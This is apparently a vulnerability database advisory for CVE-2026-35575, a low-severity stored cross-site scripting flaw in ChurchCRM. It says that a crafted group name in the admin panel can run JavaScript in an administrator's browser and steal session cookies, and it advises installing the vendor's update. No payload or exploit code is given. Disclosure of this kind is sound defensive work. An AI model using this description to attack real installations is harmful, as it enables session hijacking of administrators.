Main Vulnerability Database Vulnerabilities #VU129700

Cross-site scripting in ChurchCRM - CVE-2026-35575

Published: May 5, 2026

Vulnerability identifier: #VU129700

CSH Severity: Low

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U/U:Clear

CVE-ID: CVE-2026-35575

CWE-ID: CWE-79

Exploitation vector: Remote access

Exploit availability: No public exploit available

Vendor: ChurchCRM

Affected software:
ChurchCRM

Detailed vulnerability description

The vulnerability allows a remote user to execute arbitrary JavaScript in an administrator's browser and steal the administrator's session cookies.

The vulnerability exists due to cross-site scripting in the admin panel group-creation feature when processing a crafted group name. A remote user can create a group with malicious JavaScript in its name to execute arbitrary JavaScript in an administrator's browser and steal the administrator's session cookies.

User interaction is required when an administrator views the page containing the crafted group name.

How to mitigate CVE-2026-35575

Install security update from vendor's website.

Cross-site scripting in ChurchCRM - CVE-2026-35575

Detailed vulnerability description

How to mitigate CVE-2026-35575

Sources

Please verify you're human